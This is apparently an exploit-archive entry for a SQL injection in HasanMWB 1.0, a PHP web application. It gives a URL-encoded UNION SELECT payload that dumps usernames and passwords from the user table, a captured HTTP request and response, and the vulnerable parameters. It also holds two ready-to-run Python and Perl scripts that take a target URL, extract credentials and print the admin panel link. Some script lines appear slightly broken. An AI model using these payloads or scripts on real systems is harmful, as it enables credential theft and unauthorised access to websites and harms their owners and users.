# Exploit Title: HasanMWB 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-12-05
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://sourceforge.net/projects/hasanmwb/
# Software Link: https://netcologne.dl.sourceforge.net/project/hasanmwb/HasanMWB-v1.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
#GET /PATH/index.php?hsn=category&id=1%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d HTTP/1.1
#Host: TARGET
#User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
#Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
#Accept-Language: en-US,en;q=0.5
#Accept-Encoding: gzip, deflate
#Cookie: PHPSESSID=5lk3medj631el6lb4e77ereee5; 786e332ae62061df5c64a17076aef3ee=0li10seku22m9qr31rr8avemn2
#DNT: 1
#Connection: keep-alive
#Upgrade-Insecure-Requests: 1
#HTTP/1.1 200 OK
#Date: Wed, 05 Dec 2018 00:24:09 GMT
#Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
#X-Powered-By: PHP/5.6.30
#Expires: Thu, 19 Nov 1981 08:52:00 GMT
#Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
#Pragma: no-cache
#Content-Length: 2697
#Keep-Alive: timeout=5, max=100
#Connection: Keep-Alive
#Content-Type: text/html; charset=UTF-8
# POC:
# 1)
#index.php?hsn=page&id=[SQL] / $id = $_GET['id'];
#index.php?hsn=category&id=[SQL] / $id = $_GET['id'];
#index.php?hsn=search&q=[SQL] / $qu = $_GET['q'];
# Etc..
#!/usr/bin/python
import urllib2
import re
print """
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo----
HasanMWB 1.0 - SQL Injection
Ihsan Sencan
---------------Ooooo----
( )
ooooO ) /
( ) (_/
\ (
\_)
"""
s = raw_input("\nTarget:[http://localhost/[PATH]/] ")
e = ("index.php?hsn=category&id=1")
p = ("%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d")
response = urllib2.urlopen(s+e+p)
c = response.read()
up = re.findall(r'(.*)
', c)
print "Server: ", response.info()['server']
print (up)
print "Login Url:"+(s)+"panel.php"
#!/usr/bin/perl
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "**************************\n";
print "HasanMWB 1.0 SQL Injection\n";
print "Ihsan Sencan\n";
print "**************************\n";
use LWP::UserAgent;
print "\nTarget:[http://localhost/[PATH]/] ";
chomp(my $target=);
print "\n[!] Exploiting Progress...\n";
print "\n";
$E="/index.php?hsn=category&id=%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d";
$cc = LWP::UserAgent->new() or die "Could not initialize browser\n";
$cc->agent('Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0');
$host = $target . "".$E."";
$res = $cc->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/(.*?)<\/h2>/){
print "[+] Success !!!\n";
print "\n[+] Detail : $1\n";
print "$target/panel.php";
print "\n";
}
else{print "\n[-]Not found.\n";
}